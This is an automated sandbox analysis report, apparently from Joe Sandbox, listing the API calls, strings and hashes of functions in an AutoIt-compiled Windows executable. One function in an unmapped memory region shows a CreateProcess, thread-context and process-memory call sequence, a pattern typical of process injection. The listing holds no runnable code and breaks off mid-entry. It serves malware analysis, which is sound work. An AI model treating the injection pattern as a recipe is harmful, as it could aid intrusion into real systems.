                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                        • API String ID: 805182592-1757145024
                                                                        • Opcode ID: 835baffed4c5f729b11d61a8c88dbdaaca09fc1711bcc7954f3c872274b6f9c6
                                                                        • Instruction ID: d721cf7118c4a709dc2ed1fb5b4dee9db42af35876f41814a94dd8f916f6a502
                                                                        • Opcode Fuzzy Hash: 835baffed4c5f729b11d61a8c88dbdaaca09fc1711bcc7954f3c872274b6f9c6
                                                                        • Instruction Fuzzy Hash: 65912B71910219AFCF04EFA8CC929EEB7B4FF59310F10842AF556EB291DB749A45CB90
                                                                        APIs
                                                                          • Part of subcall function 008F5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B1148,?,008F61FF,?,00000000,00000001,00000000), ref: 008F5392
                                                                          • Part of subcall function 008F49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008F4A1D
                                                                        • _wcscat.LIBCMT ref: 00962D80
                                                                        • _wcscat.LIBCMT ref: 00962DB5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                        • String ID: \$\Include\
                                                                        • API String ID: 3592542968-2640467822
                                                                        • Opcode ID: b06a7c6ae9e085f4565ffe118881d083818c7f8fbc73c7252910964d6689f7b4
                                                                        • Instruction ID: e736dd47a58514c9c8940906f13b2815df6b3477fae05b17da49b0a1f1fce266
                                                                        • Opcode Fuzzy Hash: b06a7c6ae9e085f4565ffe118881d083818c7f8fbc73c7252910964d6689f7b4
                                                                        • Instruction Fuzzy Hash: D751847541C3449BC314EF6DDA918AAB3F8FF99320B404A2EF744D32A1EB709644DB52
                                                                        APIs
                                                                        • __getstream.LIBCMT ref: 009134FE
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00913539
                                                                        • __wopenfile.LIBCMT ref: 00913549
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                        • String ID: <G
                                                                        • API String ID: 1820251861-2138716496
                                                                        • Opcode ID: fb7c2370d9d7064f1525fb8de8fbd80652ce02197f33d7bee38230a841ae5f3f
                                                                        • Instruction ID: 5934d1286030ba9f639fc6f9a5fc07b0f3ab8b7960412bf12d25f6fcac6bd9d5
                                                                        • Opcode Fuzzy Hash: fb7c2370d9d7064f1525fb8de8fbd80652ce02197f33d7bee38230a841ae5f3f
                                                                        • Instruction Fuzzy Hash: 5D110A70B0020E9BDB12BFB08C427EE76B5AF85750B14C925F819D72D1EB34CAC197A1
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0090D28B,SwapMouseButtons,00000004,?), ref: 0090D2BC
                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0090D28B,SwapMouseButtons,00000004,?,?,?,?,0090C865), ref: 0090D2DD
                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,0090D28B,SwapMouseButtons,00000004,?,?,?,?,0090C865), ref: 0090D2FF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 31d3910b72b0bcd23fba9108e9b5d26624b4bd494de7886b72f36b3589f4cdf8
                                                                        • Instruction ID: cb272affcb32c6c9cc35f455b2a089c71c64f5932e64f7876aecd1ff4c580388
                                                                        • Opcode Fuzzy Hash: 31d3910b72b0bcd23fba9108e9b5d26624b4bd494de7886b72f36b3589f4cdf8
                                                                        • Instruction Fuzzy Hash: 8A113976616209BFDB208FA8CC84EAF7BBCEF45744F104869E805D7150E631AE41AB60
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 012760D3
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01276169
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0127618B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                        • Instruction ID: 33bc6f8ff2f0dd1e7c76f6a8fc44d990e0a090a9ef3c072bcbd1672e714ca3bb
                                                                        • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                        • Instruction Fuzzy Hash: 09621C30A24659DBEB24CFA4C851BDEB772EF58300F1091A9D20DEB390E7759E81CB59
                                                                        APIs
                                                                          • Part of subcall function 008F4517: _fseek.LIBCMT ref: 008F452F
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C65D
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C670
                                                                        • _free.LIBCMT ref: 0093C4DD
                                                                        • _free.LIBCMT ref: 0093C4E4
                                                                        • _free.LIBCMT ref: 0093C54F
                                                                          • Part of subcall function 00911C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00917A85), ref: 00911CB1
                                                                          • Part of subcall function 00911C9D: GetLastError.KERNEL32(00000000,?,00917A85), ref: 00911CC3
                                                                        • _free.LIBCMT ref: 0093C557
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                        • String ID:
                                                                        • API String ID: 1552873950-0
                                                                        • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                        • Instruction ID: 0dd64f3f7227829a159fc1a1f511b7eb4bf473327c942f45c632546af8c7c7f4
                                                                        • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                        • Instruction Fuzzy Hash: D5513DB1A04218AFDB149F68DC81BAEBBB9FF48304F10449EB259B3251DB715A908F59
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090EBB2
                                                                          • Part of subcall function 008F51AF: _memset.LIBCMT ref: 008F522F
                                                                          • Part of subcall function 008F51AF: _wcscpy.LIBCMT ref: 008F5283
                                                                          • Part of subcall function 008F51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5293
                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0090EC07
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0090EC16
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00963C88
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1378193009-0
                                                                        • Opcode ID: 00848326132946a8d60577847998cc946431a1ab41342b6e201c4100af145c91
                                                                        • Instruction ID: 842dbc1dfb9be4bc66cd90890ee883922ace3c186b548ff91bb74c7cd987cb3c
                                                                        • Opcode Fuzzy Hash: 00848326132946a8d60577847998cc946431a1ab41342b6e201c4100af145c91
                                                                        • Instruction Fuzzy Hash: 9421A7719087949FF7329B28C855BE7BBFC9F45308F04488DE6DE66181C3796A84CB51
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00963725
                                                                        • GetOpenFileNameW.COMDLG32 ref: 0096376F
                                                                          • Part of subcall function 008F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F53B1,?,?,008F61FF,?,00000000,00000001,00000000), ref: 008F662F
                                                                          • Part of subcall function 008F40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F40C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                        • String ID: X
                                                                        • API String ID: 3777226403-3081909835
                                                                        • Opcode ID: 6d869ea25e3d505fae94d22b70e86a4070030f807fd1c2461292e4e1f7c2e3bd
                                                                        • Instruction ID: 5d5568835cf89f732b3a95484248926de045eb3c80e4e931ebd5bf600b63f8c3
                                                                        • Opcode Fuzzy Hash: 6d869ea25e3d505fae94d22b70e86a4070030f807fd1c2461292e4e1f7c2e3bd
                                                                        • Instruction Fuzzy Hash: A5219971A1425CABCF11DFA8D8457EE7BF8EF49304F00805AE505E7241DBF456898F55
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0093C72F
                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0093C746
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$FileNamePath
                                                                        • String ID: aut
                                                                        • API String ID: 3285503233-3010740371
                                                                        • Opcode ID: 7d4a65de14222b29e83eef79626340c9761c5f45e7aa9c9de75e6eb731ccec86
                                                                        • Instruction ID: dbd7f255002459af3ce8129814da6b156b6b34401845541597eaaece769ffb52
                                                                        • Opcode Fuzzy Hash: 7d4a65de14222b29e83eef79626340c9761c5f45e7aa9c9de75e6eb731ccec86
                                                                        • Instruction Fuzzy Hash: DED05E7254030EABDB50AB90DC0EF8AB77C9F00708F0001A07664A50B2DAB0E6DA8B94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fca04023e40808e0b4b7ac6084b8c216ecec1cc41a6b33a9550b7da10198d10
                                                                        • Instruction ID: 42216199bbef39e42fb296bdb7e0722438aedd9fd102faf16b141b44877385cd
                                                                        • Opcode Fuzzy Hash: 0fca04023e40808e0b4b7ac6084b8c216ecec1cc41a6b33a9550b7da10198d10
                                                                        • Instruction Fuzzy Hash: 85F16A716083029FCB14DF28C495B6AB7E5FFC9314F10896EF9999B292D730E905CB82
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F5022
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F50CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell__memset
                                                                        • String ID:
                                                                        • API String ID: 928536360-0
                                                                        • Opcode ID: 7eac494b629b9a9c95eef341edcc239c6da33d9c11cc440fd558d2b651973240
                                                                        • Instruction ID: d743af7bd20742f43cb3b833ad87ac381b6829973b8b127aa3e3e441696cf299
                                                                        • Opcode Fuzzy Hash: 7eac494b629b9a9c95eef341edcc239c6da33d9c11cc440fd558d2b651973240
                                                                        • Instruction Fuzzy Hash: 7E3180B1508B05DFD721DF38D9456A7BBE8FF88318F00092EF69AC2251E7716944CB92
                                                                        APIs
                                                                        • __FF_MSGBANNER.LIBCMT ref: 00913973
                                                                          • Part of subcall function 009181C2: __NMSG_WRITE.LIBCMT ref: 009181E9
                                                                          • Part of subcall function 009181C2: __NMSG_WRITE.LIBCMT ref: 009181F3
                                                                        • __NMSG_WRITE.LIBCMT ref: 0091397A
                                                                          • Part of subcall function 0091821F: GetModuleFileNameW.KERNEL32(00000000,009B0312,00000104,00000000,00000001,00000000), ref: 009182B1
                                                                          • Part of subcall function 0091821F: ___crtMessageBoxW.LIBCMT ref: 0091835F
                                                                          • Part of subcall function 00911145: ___crtCorExitProcess.LIBCMT ref: 0091114B
                                                                          • Part of subcall function 00911145: ExitProcess.KERNEL32 ref: 00911154
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,0090F507,?,0000000E), ref: 0091399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1372826849-0
                                                                        • Opcode ID: 9490246386df8196a59e7d9f13380edf71689f942e7d9b3e01ba8c70e716e779
                                                                        • Instruction ID: 63f192b6afbf617b9fa4a5a7bd7c9ed2c311996f91583f0d381c7521f94c8bf9
                                                                        • Opcode Fuzzy Hash: 9490246386df8196a59e7d9f13380edf71689f942e7d9b3e01ba8c70e716e779
                                                                        • Instruction Fuzzy Hash: A601F53635921DEAE6223B74DC42BEE736C9FC1760F208125F5059B292DFB4DDC086A0
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0093C385,?,?,?,?,?,00000004), ref: 0093C6F2
                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0093C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0093C708
                                                                        • CloseHandle.KERNEL32(00000000,?,0093C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0093C70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: ec0134e924f0d5d0a9f4549add86b617cfb9956e906917019c4607db58b0d763
                                                                        • Instruction ID: 1b8fc610f218ceb38659446bb3ec6eb636a98dfe04dd031727ee4ebe3ddf751e
                                                                        • Opcode Fuzzy Hash: ec0134e924f0d5d0a9f4549add86b617cfb9956e906917019c4607db58b0d763
                                                                        • Instruction Fuzzy Hash: A5E08633145214B7D7212B54AC09FCE7B29AF05B61F104110FB19790E097B125519B98
                                                                        APIs
                                                                        • _free.LIBCMT ref: 0093BB72
                                                                          • Part of subcall function 00911C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00917A85), ref: 00911CB1
                                                                          • Part of subcall function 00911C9D: GetLastError.KERNEL32(00000000,?,00917A85), ref: 00911CC3
                                                                        • _free.LIBCMT ref: 0093BB83
                                                                        • _free.LIBCMT ref: 0093BB95
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                        • Instruction ID: 3f1e2647dd94bb6c96de4de28f02c0353b626eccd342f341bead880bbe699a62
                                                                        • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                        • Instruction Fuzzy Hash: BEE0C2A130074452CA2065386E44FF763DC0F45310B04080DB699E3142CF20E88088E4
                                                                        APIs
                                                                          • Part of subcall function 008F22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008F24F1), ref: 008F2303
                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008F25A1
                                                                        • CoInitialize.OLE32(00000000), ref: 008F2618
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0096503A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 3815369404-0
                                                                        • Opcode ID: 4999e1771b1111bf235d8462cce164c733d7c585566a4271fc2abe1bdfa31ffa
                                                                        • Instruction ID: d9f2feb403f1e65449fbd6714578f9d17d54d9cb30d16316dfec17beaaa13181
                                                                        • Opcode Fuzzy Hash: 4999e1771b1111bf235d8462cce164c733d7c585566a4271fc2abe1bdfa31ffa
                                                                        • Instruction Fuzzy Hash: 7B71DCB48293458B8714EF6EABB0599BBE5FB983607D0432EE129C73B1DB704400EF55
                                                                        APIs
                                                                        • _strcat.LIBCMT ref: 009508FD
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • _wcscpy.LIBCMT ref: 0095098C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1012013722-0
                                                                        • Opcode ID: d0f03066d883fb9a191662cb42676b1c9176d91089a4bf1bf0a1a6078c6fee50
                                                                        • Instruction ID: 293bb5095010b37e12c465ea3d1574e35f10f3ca00c214e41db46706ace8b65f
                                                                        • Opcode Fuzzy Hash: d0f03066d883fb9a191662cb42676b1c9176d91089a4bf1bf0a1a6078c6fee50
                                                                        • Instruction Fuzzy Hash: 6E913434A00605DFCB18DF29C495AA9B7E5FF89311B54846AED5ACF3A2DB30ED45CB80
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 008F3A73
                                                                          • Part of subcall function 00911405: __lock.LIBCMT ref: 0091140B
                                                                          • Part of subcall function 008F3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008F3AF3
                                                                          • Part of subcall function 008F3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F3B08
                                                                          • Part of subcall function 008F3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008F3AA3,?), ref: 008F3D45
                                                                          • Part of subcall function 008F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,008F3AA3,?), ref: 008F3D57
                                                                          • Part of subcall function 008F3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009B1148,009B1130,?,?,?,?,008F3AA3,?), ref: 008F3DC8
                                                                          • Part of subcall function 008F3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,008F3AA3,?), ref: 008F3E48
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F3AB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
